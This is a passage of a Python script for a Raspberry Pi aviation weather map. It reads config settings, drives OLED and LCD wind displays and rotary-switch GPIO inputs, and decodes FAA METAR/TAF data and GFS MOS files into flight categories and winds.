data_sw6 = config.data_sw6 #User selectable source of data on Rotary Switch position 6. 0 = TAF, 1 = METAR, 2 = MOS
data_sw7 = config.data_sw7 #User selectable source of data on Rotary Switch position 7. 0 = TAF, 1 = METAR, 2 = MOS
data_sw8 = config.data_sw8 #User selectable source of data on Rotary Switch position 8. 0 = TAF, 1 = METAR, 2 = MOS
data_sw9 = config.data_sw9 #User selectable source of data on Rotary Switch position 9. 0 = TAF, 1 = METAR, 2 = MOS
data_sw10 = config.data_sw10 #User selectable source of data on Rotary Switch position 10. 0 = TAF, 1 = METAR, 2 = MOS
data_sw11 = config.data_sw11 #User selectable source of data on Rotary Switch position 11. 0 = TAF, 1 = METAR, 2 = MOS
time_sw0 = config.time_sw0 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw1 = config.time_sw1 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw2 = config.time_sw2 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw3 = config.time_sw3 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw4 = config.time_sw4 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw5 = config.time_sw5 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw6 = config.time_sw6 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw7 = config.time_sw7 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw8 = config.time_sw8 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw9 = config.time_sw9 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw10 = config.time_sw10 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw11 = config.time_sw11 #1 = number of hours ahead to display. Time equals time period of TAF/MOS to display.
displayIP = config.displayIP #display IP address with welcome message, 0 = No, 1 = Yes
#MOS Config settings
prob = config.prob #probability threshhold in Percent to assume reported weather will be displayed on map or not.
#Specific settings for on/off timer. Used to turn off LED's at night if desired.
#Verify Raspberry Pi is set to the correct time zone, otherwise the timer will be off.
usetimer = config.usetimer #0 = No, 1 = Yes. Turn the timer on or off with this setting
offhour = config.offhour #Use 24 hour time. Set hour to turn off display
offminutes = config.offminutes #Set minutes to turn off display
onhour = config.onhour #Use 24 hour time. Set hour to turn on display
onminutes = config.onminutes #Set minutes to on display
#Sleep Timer settings
tempsleepon = config.tempsleepon #Set number of MINUTES to turn map on temporarily during sleep mode
sleepmsg = config.sleepmsg #Display message "Sleeping". 0 = No, 1 = Yes.
#Display type to use. Both can be used but will delay before updating each display.
lcddisplay = config.lcddisplay #1 = Yes, 0 = No. Using an LCD to display the highest winds. Scripted for 64x2 LCD display use.
oledused = config.oledused #1 = Yes, 0 = No. Using a single OLED to display the highest winds and airports
#Misc Settings - Should match the values in metar-v3.py
update_interval = config.update_interval #Number of MINUTES between FAA updates - 15 minutes is a good compromise.
metar_age = config.metar_age #Metar Age in HOURS. This will pull the latest metar that has been published within the timeframe listed here.
num2display = config.num2display #number of highest wind airports to display. Can be as high as airports listed in airports file. 5 to 10 good number.
abovekts = config.abovekts #1 = Yes, 0 = No. If "Yes" then only display high winds above value stored in 'minwinds' below.
minwinds = config.max_wind_speed #Value in knots to filter high winds. if abovekts is 1 then don't display winds less than this value on LCD/OLED
#LCD Display settings
lcdpause = config.lcdpause #pause between character movements in scroll.
#OLED Display settings
numofdisplays = config.numofdisplays #Number of OLED displays being used. 1 Oled minimum. With TCA9548A I2C Multiplexer, 8 can be used.
oledpause = config.oledpause #Pause time in seconds between airport display updates
fontsize = config.fontsize #Size of font for OLED display. 24 works well with current font type
boldhiap = config.boldhiap #1 = Yes, 0 = No. Bold the text for the airport that has the highest windspeed.
blankscr = config.blankscr #1 = Yes, 0 = No. Add a blank screen between the group of airports to display.
offset = config.offset #Pixel offset for OLED text display vertically. Leave at 3 for current font type.
border = config.border #0 = no border, 1 = yes border. Either works well.
dimswitch = config.dimswitch #0 = Full Bright, 1 = Low Bright, 2 = Medium Bright, if IC238 Light Sensor is NOT used.
dimmin = config.dimmin #Set value 0-255 for the minimum brightness (0=darker display, but not off)
dimmax = config.dimmax #Set value 0-255 for the maximum brightness (bright display)
invert = config.invert #0 = normal display, 1 = inverted display, supercedes toginv. Normal = white text on black background.
toginv = config.toginv #0 = no toggle of inverted display. 1 = toggle inverted display between groups of airports
scrolldis = config.scrolldis #0 = Scroll display to left, 1 = scroll display to right
usewelcome = config.usewelcome #0 = No, 1 = Yes. Display a welcome message on the displays?
welcome = config.welcome #will display each time the FAA weather is updated.
displaytime = config.displaytime #0 = No, 1 = Yes. Display the local and Zulu Time between hi-winds display
#*********************************
#* End of User Defined Settings *
#*********************************
#misc settings that won't normally need to be changed.
fontindex = 0 #Font selected may have various versions that are indexed. 0 = Normal. Leave at 0 unless you know otherwise.
backcolor = 0 #0 = Black, background color for OLED display. Shouldn't need to change
fontcolor = 255 #255 = White, font color for OLED display. Shouldn't need to change
temp_time_flag = 0 #Set flag for next round of tempsleepon activation (temporarily turns on map when in sleep mode)
#Set general GPIO parameters
GPIO.setmode(GPIO.BCM) #set mode to BCM and use BCM pin numbering, rather than BOARD pin numbering.
GPIO.setwarnings(False)
#Set GPIO pin 4 for IC238 Light Sensor, if used.
GPIO.setup(4, GPIO.IN) #set pin 4 as input for light sensor, if one is used. If no sensor used board remains at high brightness always.
#set GPIO pin 22 to momentary push button to force FAA Weather Data update if button is used.
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_UP)
#Setup GPIO pins for rotary switch to choose between METARs, or TAFs and which hour of TAF
#Not all the pins are required to be used. If only METARS are desired, then no Rotary Switch is needed.
#A rotary switch with up to 12 poles can be installed, but as few as 2 poles will switch between METAR's and TAF's
GPIO.setup(0, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 0 to ground for METARS
GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 5 to ground for TAF + 1 hour
GPIO.setup(6, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 6 to ground for TAF + 2 hours
GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 13 to ground for TAF + 3 hours
GPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 19 to ground for TAF + 4 hours
GPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 26 to ground for TAF + 5 hours
GPIO.setup(21, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 21 to ground for TAF + 6 hours
GPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 20 to ground for TAF + 7 hours
GPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 16 to ground for TAF + 8 hours
GPIO.setup(12, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 12 to ground for TAF + 9 hours
GPIO.setup(1, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 1 to ground for TAF + 10 hours
GPIO.setup(7, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 7 to ground for TAF + 11 hours
# Raspberry Pi pin configuration:
RST = None #on the PiOLED this pin isnt used
#Setup Adafruit library for OLED display.
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST) #128x64 or 128x32 - disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)
TCA_ADDR = 0x70 #use cmd i2cdetect -y 1 to ensure multiplexer shows up at addr 0x70
tca = I2C.get_i2c_device(address=TCA_ADDR)
port = 1 #Default port. set to 0 for original RPi or Orange Pi, etc
bus = smbus2.SMBus(port) #From smbus2 set bus number
#Setup paths for restart on change routine. Routine from;
#https://blog.petrzemek.net/2014/03/23/restarting-a-python-script-within-itself
LOCAL_CONFIG_FILE_PATH = '/NeoSectional/config.py'
WATCHED_FILES = [LOCAL_CONFIG_FILE_PATH, __file__]
WATCHED_FILES_MTIMES = [(f, getmtime(f)) for f in WATCHED_FILES]
logger.info('Watching ' + LOCAL_CONFIG_FILE_PATH + ' For Change')
#Timer calculations - Part of Timer Fix - Thank You to Matthew G
now = datetime.now() #Get current time and compare to timer setting
lights_out = time_(offhour, offminutes, 0)
timeoff = lights_out
lights_on = time_(onhour, onminutes, 0)
end_time = lights_on
delay_time = 10 #Number of seconds to delay before retrying to connect to the internet.
temp_lights_on = 0 #Set flag for next round if sleep timer is interrupted by button push.
#MOS related settings
mos_filepath = '/NeoSectional/GFSMAV' #location of the downloaded local MOS file.
categories = ['HR', 'CLD', 'WDR', 'WSP', 'P06', 'T06', 'POZ', 'POS', 'TYP', 'CIG','VIS','OBV'] #see legend below
obv_wx = {'N': 'None', 'HZ': 'HZ','BR': 'RA','FG': 'FG','BL': 'HZ'} #Decode from MOS to TAF/METAR
typ_wx = {'S': 'SN','Z': 'FZRA','R': 'RA'} #Decode from MOS to TAF/METAR
mos_dict = collections.OrderedDict() #Outer Dictionary, keyed by airport ID
hour_dict = collections.OrderedDict() #Middle Dictionary, keyed by hour of forcast. Will contain a list of data for categories.
ap_flag = 0 #Used to determine that an airport from our airports file is currently being read.
hmdata_dict = {} #Used for top 10 list for heat map
startnum = 0 #Used for cycling through the number of displays used.
stopnum = numofdisplays #Same
stepnum = 1 #Same
#Get info to display active IP address
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
logger.info("Settings Loaded")
#Functions
# Part of Timer Fix - Thank You to Matthew G
# See if a time falls within a range
def time_in_range(start, end, x):
if start <= end:
return start <= x <= end
else:
return start <= x or x <= end
#Functions for LCD Display
def write_to_lcd(lcd, framebuffer, num_cols):
#Write the framebuffer out to the specified LCD.
lcd.home()
for row in framebuffer:
lcd.write_string(row.ljust(num_cols)[:num_cols])
lcd.write_string('\r\n')
def loop_string(string, lcd, framebuffer, row, num_cols, delay=0.4):
padding = ' ' * num_cols
s = padding + string + padding
for i in range(len(s) - num_cols + 1):
framebuffer[row] = s[i:i+num_cols]
write_to_lcd(lcd, framebuffer, num_cols)
time.sleep(delay)
#Functions for OLED display
def tca_select(channel): #Used to tell the multiplexer which oled display to send data to.
#Select an individual channel
if channel > 7 or numofdisplays < 2: #Verify we need to use the multiplexer.
return
tca.writeRaw8(1 << channel) #from Adafruit_GPIO I2C
def oledcenter(txt, ch, font, dir=0, dim=dimswitch, onoff = 0, pause = 0): #Center text vertically and horizontally
tca_select(ch) #Select the display to write to
oleddim(dim) #Set brightness, 0 = Full bright, 1 = medium bright, 2 = low brightdef oledcenter(txt): #Center text vertically and horizontally
draw.rectangle((0, 0, width-1, height-1), outline=border, fill=backcolor) #blank the display
x1, y1, x2, y2 = 0, 0, width, height #create boundaries of display
if dir == "" or txt == '\n' or 'Updated' in txt or 'Calm' in txt: #Print text other than wind directions and speeds
pass
elif 'METARs' in txt or 'TAF' in txt or 'MOS' in txt or 'Heat' in txt: #Print text other than wind directions and speeds
pass
elif wind_numorarrow == 0: #draw wind direction using arrows
arrowdir = winddir(dir) #get proper proper arrow to display
draw.text((96, 37), arrowdir, font=arrows, fill=fontcolor) #lower right of oled
txt = txt + 'kts'
pass
else: #draw wind direction using numbers
ap, wndsp = txt.split('\n')
wnddir = str(dir)
if len(wnddir) == 2: #pad direction with zeros to get 3 digits.
wnddir = '0' + wnddir
elif len(wnddir) == 1:
wnddir = '00' + wnddir
#Calm and VRB winds contributed by Lance Black - Thank you Lance
if wnddir == '000' and wndsp == '0':
txt = ap + "\n" + 'Calm'
elif wnddir == '000' and wndsp >= '1' and gust > 0:
txt = ap + "\n" + 'VRB@' + wndsp + 'g' + str(gust)
elif wnddir == '000' and wndsp >= '1' and gust == 0:
txt = ap + "\n" + 'VRB@' + wndsp + 'kts'
elif gust == 0 or gust == '' or gust == None: #Lance Blank
txt = ap + '\n' + wnddir + chr(176) + '@' + wndsp + 'kts' #'360@21kts' layout
elif gust > 0:
txt = ap + '\n' + wnddir + '@' + wndsp + 'g' + str(gust) #Lance Blank - '360@5g12' layout
else:
txt = ap + "\n" + wndsp + 'kts'
w, h = draw.textsize(txt, font=font) #get textsize of what is to be displayed
x = (x2 - x1 - w)/2 + x1 #calculate center for text
y = (y2 - y1 - h)/2 + y1 - offset
draw.text((x, y), txt, align='center', font=font, fill=fontcolor) #Draw the text to buffer
invertoled(onoff) #invert display if set
rotate180(rotyesno) #Rotate display if setrotate180
disp.image(image) #Display image
disp.display() #display text in buffer
time.sleep(pause) #pause long enough to be read
def winddir(wndir=0): #Using the arrows.ttf font return arrow to represent wind direction at airport
if (wndir >= 338 and wndir <= 360) or (wndir >= 1 and wndir <= 22): #8 arrows representing 45 degrees each around the compass.
return 'd' #wind blowing from the north (pointing down)
elif wndir >= 23 and wndir <= 67:
return 'f' #wind blowing from the north-east (pointing lower-left)
elif wndir >= 68 and wndir <= 113:
return 'b' #wind blowing from the east (pointing left)
elif wndir >= 114 and wndir <= 159:
return 'e' #wind blowing from the south-east (pointing upper-left)
elif wndir >= 160 and wndir <= 205:
return 'c' #wind blowing from the south (pointing up)
elif wndir >= 206 and wndir <= 251:
return 'g' #wind blowing from the south-west (pointing upper-right)
elif wndir >= 252 and wndir <= 297:
return 'a' #wind blowing from the west (pointing right)
elif wndir >= 298 and wndir <= 337:
return 'h' #wind blowing from the north-west (pointing lower-right)
else:
return '' #No arrow returned
def oleddim(level=0): #Dimming routine. 0 = Full Brightness, 1 = low brightness, 2 = medium brightness. See https://www.youtube.com/watch?v=hFpXfSnDNSY a$
if level == 0: #https://github.com/adafruit/Adafruit_Python_SSD1306/blob/master/Adafruit_SSD1306/SSD1306.py for more info.
disp.command(0x81) #SSD1306_SETCONTRAST = 0x81
disp.command(dimmax)
disp.command(0xDB) #SSD1306_SETVCOMDETECT = 0xDB
disp.command(dimmax)
if level == 1 or level == 2:
disp.command(0x81) #SSD1306_SETCONTRAST = 0x81
disp.command(dimmin)
if level == 1:
disp.command(0xDB) #SSD1306_SETVCOMDETECT = 0xDB
disp.command(dimmin)
def invertoled(i): #Invert display pixels. Normal = white text on black background.
if i: #Inverted = black text on white background #0 = Normal, 1 = Inverted
disp.command(0xA7) #SSD1306_INVERTDISPLAY
else:
disp.command(0xA6) #SSD1306_NORMALDISPLAY
def rotate180(i): #Rotate display 180 degrees to allow mounting of OLED upside down
if i:
#Y Direction
disp.command(0xA0)
#X Direction
disp.command(0xC0)
else:
pass
def clearoleddisplays():
for j in range(numofdisplays):
tca_select(j)
# disp.clear() #commenting this out sped up the display refresh.
draw.rectangle((0,0,width-1,height-1), outline=border, fill=backcolor)
disp.image(image)
disp.display()
#Compare current time plus offset to TAF's time period and return difference
def comp_time(taf_time):
global current_zulu
datetimeFormat = ('%Y-%m-%dT%H:%M:%SZ')
date1 = taf_time
date2 = current_zulu
diff = datetime.strptime(date1, datetimeFormat) - datetime.strptime(date2, datetimeFormat)
diff_minutes = int(diff.seconds/60)
diff_hours = int(diff_minutes/60)
return diff.seconds, diff_minutes, diff_hours, diff.days
#Used by MOS decode routine. This routine builds mos_dict nested with hours_dict
def set_data():
global hour_dict
global mos_dict
global dat0, dat1, dat2, dat3, dat4, dat5, dat6, dat7
global apid
global temp
global keys
#Clean up line of MOS data.
if len(temp) >= 0: #this check is unneeded. Put here to vary length of list to clean up.
temp1 = []
tmp_sw = 0
for val in temp: #Check each item in the list
val = val.lstrip() #remove leading white space
val = val.rstrip('/') #remove trailing /
if len(val) == 6: #this is for T06 to build appropriate length list
temp1.append('0') #add a '0' to the front of the list. T06 doesn't report data in first 3 hours.
temp1.append(val) #add back the original value taken from T06
tmp_sw = 1 #Turn on switch so we don't go through it again.
elif len(val) > 2 and tmp_sw == 0: #if item is 1 or 2 chars long, then bypass. Otherwise fix.
pos = val.find('100') #locate first 100
tmp = val[0:pos] #capture the first value which is not a 100
temp1.append(tmp) #and store it in temp list.
k = 0
for j in range(pos, len(val), 3): #now iterate through remainder
temp1.append(val[j:j+3]) #and capture all the 100's
k += 1
else:
temp1.append(val) #Store the normal values too.
temp = temp1
#load data into appropriate lists by hours designated by current MOS file
#clean up data by removing '/' and spaces
temp0 = ([x.strip() for x in temp[0].split('/')])
temp1 = ([x.strip() for x in temp[1].split('/')])
temp2 = ([x.strip() for x in temp[2].split('/')])
temp3 = ([x.strip() for x in temp[3].split('/')])
temp4 = ([x.strip() for x in temp[4].split('/')])
temp5 = ([x.strip() for x in temp[5].split('/')])
temp6 = ([x.strip() for x in temp[6].split('/')])
temp7 = ([x.strip() for x in temp[7].split('/')])
#build a list for each data group. grab 1st element [0] in list to store.
dat0.append(temp0[0])
dat1.append(temp1[0])
dat2.append(temp2[0])
dat3.append(temp3[0])
dat4.append(temp4[0])
dat5.append(temp5[0])
dat6.append(temp6[0])
dat7.append(temp7[0])
j = 0
for key in keys: #add cat data to the hour_dict by hour
if j == 0:
hour_dict[key] = dat0
elif j == 1:
hour_dict[key] = dat1
elif j == 2:
hour_dict[key] = dat2
elif j == 3:
hour_dict[key] = dat3
elif j == 4:
hour_dict[key] = dat4
elif j == 5:
hour_dict[key] = dat5
elif j == 6:
hour_dict[key] = dat6
elif j == 7:
hour_dict[key] = dat7
j += 1
mos_dict[apid] = hour_dict #marry the hour_dict to the proper key in mos_dict
##########################
# Start of executed code #
##########################
while True:
logger.info('Start of metar-display-v4.py executed code main loop')
#Time calculations, dependent on 'hour_to_display' offset. this determines how far in the future the TAF data should be.
#This time is recalculated everytime the FAA data gets updated
zulu = datetime.utcnow() + timedelta(hours=hour_to_display) #Get current time plus Offset
current_zulu = zulu.strftime('%Y-%m-%dT%H:%M:%SZ') #Format time to match whats reported in TAF
current_hr_zulu = zulu.strftime('%H') #Zulu time formated for just the hour, to compare to MOS data
logger.debug('datetime - ' + str(datetime.utcnow()))
logger.debug('zulu - ' + str(zulu))
logger.debug('hour_to_display - ' + str(hour_to_display))
logger.debug('current_zulu - ' + str(current_zulu))
#Get current date and time
now = datetime.now()
dt_string = now.strftime("%I:%M%p") #12:00PM format
#Dictionary definitions. Need to reset whenever new weather is received
stationiddict = {} #hold the airport identifiers
windsdict = {} #holds the wind speeds by identifier
wnddirdict = {} #holds the wind direction by identifier
wxstringdict = {} #holds the weather conditions by identifier
wndgustdict = {} #hold wind gust by identifier - Mez
#read airports file - read each time weather is updated in case a change to "airports" file was made while script was running.
try:
with open("/NeoSectional/airports") as f:
airports = f.readlines()
except IOError as error:
logger.error('Airports file could not be loaded.')
logger.error(error)
break
airports = [x.strip() for x in airports]
logger.info("Airports File Loaded")
#read hmdata file and display the top 10 airports on the OLEDs
try:
with open("/NeoSectional/hmdata") as f:
hmdata = f.readlines()
except IOError as error:
logger.error('Heat Map file could not be loaded.')
logger.error(error)
break
hmdata = [x.strip() for x in hmdata]
logger.info("Heat Map File Loaded")
for line in hmdata:
hmap, numland = line.split()
hmdata_dict[hmap] = int(numland)
hmdata_sorted = sorted(hmdata_dict.items(), key=lambda x:x[1], reverse=True)
hmdata_sorted.insert(0, 'Top AP\nLandings')
print(hmdata_sorted)
#depending on what data is to be displayed, either use an URL for METARs and TAFs or read file from drive (pass).
if metar_taf_mos == 1: #Check to see if the script should display TAF data (0) or METAR data (1)
#Define URL to get weather METARS. If no METAR reported withing the last 2.5 hours, Airport LED will be white (nowx).
url = "https://www.aviationweather.gov/adds/dataserver_current/httpparam?dataSource=metars&requestType=retrieve&format=xml&mostRecentForEachStation=constraint&hoursBeforeNow="+str(metar_age)+"&stationString="
logger.info("METAR Data Loading")
elif metar_taf_mos == 0: #TAF data
#Define URL to get weather URL for TAF. If no TAF reported for an airport, the Airport LED will be white (nowx).
url = "https://www.aviationweather.gov/adds/dataserver_current/httpparam?dataSource=tafs&requestType=retrieve&format=xml&mostRecentForEachStation=constraint&hoursBeforeNow="+str(metar_age)+"&stationString="
logger.info("TAF Data Loading")
elif metar_taf_mos == 2: #MOS data. This is not accessible in the same way as METARs and TAF's.
pass #This elif is not strictly needed and is only here for clarity
logger.info("MOS Data Loading")
elif metar_taf_mos == 3: #Heat Map data.
pass #This elif is not strictly needed and is only here for clarity
logger.info("Heat Map Data Loading")
#Build URL to submit to FAA with the proper airports from the airports file
if metar_taf_mos != 2 and metar_taf_mos != 3:
for airportcode in airports:
if airportcode == "NULL" or airportcode == "LGND":
continue
url = url + airportcode + ","
url = url[:-1] #strip trailing comma from string
logger.debug(url)
while True: #check internet availability and retry if necessary. Power outage, map may boot quicker than router.
try:
content = urllib.request.urlopen(url)
logger.info('Internet Available')
logger.info(url)
break
except:
logger.warning('FAA Data is Not Available')
logger.info(url)
time.sleep(delay_time)
pass
root = ET.fromstring(content.read()) #Process XML data returned from FAA
#MOS decode routine
#MOS data is downloaded daily from; https://www.weather.gov/mdl/mos_gfsmos_mav to the local drive by crontab scheduling.
#Then this routine reads through the entire file looking for those airports that are in the airports file. If airport is
#found, the data needed to display the weather for the next 24 hours is captured into mos_dict, which is nested with
#hour_dict, which holds the airport's MOS data by 3 hour chunks. See; https://www.weather.gov/mdl/mos_gfsmos_mavcard for
#a breakdown of what the MOS data looks like and what each line represents.
if metar_taf_mos == 2:
#Read current MOS text file
try:
file = open(mos_filepath, 'r')
lines = file.readlines()
except IOError as error:
logger.error('MOS data file could not be loaded.')
logger.error(error)
break
for line in lines: #read the MOS data file line by line0
line = str(line)
#Ignore blank lines of MOS airport
if line.startswith(' '):
ap_flag = 0
continue
#Check for and grab date of MOS
if 'DT /' in line:
unused, dt_cat, month, unused, unused, day, unused = line.split(" ",6)
continue
#Check for and grab the Airport ID of the current MOS
if 'MOS' in line:
unused, apid, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, updt1, updt2, v13 = line.split(" ", 14)
mos_updt_time = updt1 + ' ' + updt2 #Grab the MOS report's update timestamp
dt_string = mos_updt_time
#If this Airport ID is in the airports file then grab all the info needed from this MOS
if apid in airports:
ap_flag = 1
cat_counter = 0 #used to determine if a category is being reported in MOS or not. If not, need to inject i$
dat0, dat1, dat2, dat3, dat4, dat5, dat6, dat7 = ([] for i in range(8)) #Clear lists
continue
#If we just found an airport that is in our airports file, then grab the appropriate weather data from it's MOS
if ap_flag:
xtra, cat, value = line.split(" ",2) #capture the category the line read represents
#Check if the needed categories are being read and if so, grab its data
if cat in categories:
cat_counter += 1 #used to check if a category is not in mos report for airport
if cat == 'HR': #hour designation
temp = (re.findall(r'\s?(\s*\S+)', value.rstrip())) #grab all the hours from line read
for j in range(8):
tmp = temp[j].strip()
hour_dict[tmp] = '' #create hour dictionary based on mos data
keys = list(hour_dict.keys()) #Get the hours which are the keys in this dict, so they can be prope$
else:
#Checking for missing lines of data and x out if necessary.
if (cat_counter == 5 and cat != 'P06')\
or (cat_counter == 6 and cat != 'T06')\
or (cat_counter == 7 and cat != 'POZ')\
or (cat_counter == 8 and cat != 'POS')\
or (cat_counter == 9 and cat != 'TYP'):
#calculate the number of consecutive missing cats and inject 9's into those positions
a = categories.index(last_cat)+1
b = categories.index(cat)+1
c = b - a - 1
logger.debug(apid,last_cat,cat,a,b,c)
for j in range(c):
temp = ['9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9']
set_data()
cat_counter += 1
#Now write the orignal cat data read from the line in the mos file
cat_counter += 1
hour_dict = collections.OrderedDict() #clear out hour_dict for next airport
last_cat = cat
temp = (re.findall(r'\s?(\s*\S+)', value.rstrip())) #add the actual line of data read
set_data()
hour_dict = collections.OrderedDict() #clear out hour_dict for next airport
else:
#continue to decode the next category data that was read.
last_cat = cat #store what the last read cat was.
temp = (re.findall(r'\s?(\s*\S+)', value.rstrip()))
set_data()
hour_dict = collections.OrderedDict() #clear out hour_dict for next airport
#Now grab the data needed to display on map. Key: [airport][hr][j] - using nested dictionaries
# airport = from airport file, 4 character ID. hr = 1 of 8 three-hour periods of time, 00 03 06 09 12 15 18 21
# j = index to weather categories, in this order; 'CLD','WDR','WSP','P06', 'T06', 'POZ', 'POS', 'TYP','CIG','VIS','OBV'.
# See; https://www.weather.gov/mdl/mos_gfsmos_mavcard for description of available data.
for airport in airports:
if airport in mos_dict:
logger.debug('\n' + airport)
logger.debug(categories)
mos_time = int(current_hr_zulu) + hour_to_display
if mos_time >= 24: #check for reset at 00z
mos_time = mos_time - 24
logger.debug(keys)
for hr in keys:
logger.debug(hr + ", " + str(mos_time) + ", " + str(int(hr)+2.99))
if int(hr) <= mos_time <= int(hr)+2.99:
cld = (mos_dict[airport][hr][0])
wdr = (mos_dict[airport][hr][1]) +'0' #make wind direction end in zero
wsp = (mos_dict[airport][hr][2])
p06 = (mos_dict[airport][hr][3])
t06 = (mos_dict[airport][hr][4])
poz = (mos_dict[airport][hr][5])
pos = (mos_dict[airport][hr][6])
typ = (mos_dict[airport][hr][7])
cig = (mos_dict[airport][hr][8])
vis = (mos_dict[airport][hr][9])
obv = (mos_dict[airport][hr][10])
logger.debug(hr+", "+cld+", "+wdr+", "+wsp+", "+p06+", "+t06+", "+poz+", "+pos+", "+typ+", "+cig+", "+vis+", "+obv) #debug
#decode the weather for each airport to display on the livesectional map
flightcategory = "VFR" #start with VFR as the assumption
if cld in ("OV","BK"): #If the layer is OVC, BKN, set Flight category based on height of layer
if cig <= '2': #AGL is less than 500:
flightcategory = "LIFR"
elif cig == '3': #AGL is between 500 and 1000
flightcategory = "IFR"
elif '4' <= cig <= '5': #AGL is between 1000 and 3000:
flightcategory = "MVFR"
elif cig >= '6': #AGL is above 3000
flightcategory = "VFR"
#Check visability too.
if flightcategory != "LIFR": #if it's LIFR due to cloud layer, no reason to check any other things$
if vis <= '2': #vis < 1.0 mile:
flightcategory = "LIFR"
elif '3' <= vis < '4': #1.0 <= vis < 3.0 miles:
flightcategory = "IFR"
elif vis == '5' and flightcategory != "IFR": #3.0 <= vis <= 5.0 miles
flightcategory = "MVFR"
logger.debug(flightcategory + " |"),
logger.debug('Windspeed = ' + wsp + ' | Wind dir = ' + wdr + ' |'),
#decode reported weather using probabilities provided.
if typ == '9': #check to see if rain, freezing rain or snow is reported. If not use obv weather
wx = obv_wx[obv] #Get proper representation for obv designator
else:
wx = typ_wx[typ] #Get proper representation for typ designator
if wx == 'RA' and int(p06) < prob:
if obv != 'N':
wx = obv_wx[obv]
else:
wx = 'NONE'
if wx == 'SN' and int(pos) < prob:
wx = 'NONE'
if wx == 'FZRA' and int(poz) < prob:
wx = 'NONE'
if t06 == '' or t06 is None:
t06 = '0'
if int(t06) > prob: #check for thunderstorms
wx = 'TSRA'
else:
wx = 'NONE'
logger.debug('Reported Weather = ' + wx)
#Connect the information from MOS to the board
stationId = airport
#grab wind speeds from returned MOS data
if wsp == None: #if wind speed is blank, then bypass
windspeedkt = 0
elif wsp == '99': #Check to see if the MOS data didn't report a windspeed for this airport
windspeedkt = 0
else:
windspeedkt = int(wsp)
#grab wind direction from returned FAA data
if wdr == None: #if wind direction is blank, then bypass
winddirdegree = 0
else:
winddirdegree = int(wdr)
#grab Weather info from returned FAA data
if wx is None: #if weather string is blank, then bypass
wxstring = "NONE"
else:
wxstring = wx
logger.debug(stationId+ ", " + str(windspeedkt) + ", " + wxstring)
#Check for duplicate airport identifier and skip if found, otherwise store in dictionary. covers for dups in "airp$
if stationId in stationiddict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
stationiddict[stationId] = flightcategory #build category dictionary
if stationId in windsdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
windsdict[stationId] = windspeedkt #build windspeed dictionary
if stationId in wnddirdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wnddirdict[stationId] = winddirdegree #build wind direction dictionary
if stationId in wxstringdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wxstringdict[stationId] = wxstring #build weather dictionary
logger.info("Decoded MOS Data for Display")
#TAF decode routine. This routine will decode the TAF, pick the appropriate time frame to display.
if metar_taf_mos == 0: #0 equals display TAF.
#start of TAF decoding routine
for data in root.iter('data'):
num_results = data.attrib['num_results'] #get number of airports reporting TAFs to be used for diagnosis only
logger.debug("\nNum of Airport TAFs = " + num_results)
for taf in root.iter('TAF'): #iterate through each airport's TAF
stationId = taf.find('station_id').text
logger.debug(stationId)
logger.debug('Current+Offset Zulu - ' + current_zulu)
taf_wx_string = ""
taf_change_indicator = ""
taf_wind_dir_degrees = ""
taf_wind_speed_kt = ""
taf_wind_gust_kt = ""
for forecast in taf.findall('forecast'): #Now look at the forecasts for the airport
# Routine inspired by Nick Cirincione.
flightcategory = "VFR" #intialize flight category
taf_time_from = forecast.find('fcst_time_from').text #get taf's from time
taf_time_to = forecast.find('fcst_time_to').text #get taf's to time
if forecast.find('wx_string') is not None:
taf_wx_string = forecast.find('wx_string').text #get weather conditions
if forecast.find('change_indicator') is not None:
taf_change_indicator = forecast.find('change_indicator').text #get change indicator
if forecast.find('wind_dir_degrees') is not None:
taf_wind_dir_degrees = forecast.find('wind_dir_degrees').text #get wind direction
if forecast.find('wind_speed_kt') is not None:
taf_wind_speed_kt = forecast.find('wind_speed_kt').text #get wind speed
if forecast.find('wind_gust_kt') is not None:
taf_wind_gust_kt = forecast.find('wind_gust_kt').text #get wind gust speed
if taf_time_from <= current_zulu <= taf_time_to: #test if current time plus offset falls within taf's timeframe
logger.debug('TAF FROM - ' + taf_time_from)
logger.debug(comp_time(taf_time_from))
logger.debug('TAF TO - ' + taf_time_to)
logger.debug(comp_time(taf_time_to))
#There can be multiple layers of clouds in each taf, but they are always listed lowest AGL first.
#Check the lowest (first) layer and see if it's overcast, broken, or obscured. If it is, then compare to cloud bas$
#This algorithm basically sets the flight category based on the lowest OVC, BKN or OVX layer.
for sky_condition in forecast.findall('sky_condition'): #for each sky_condition from the XML
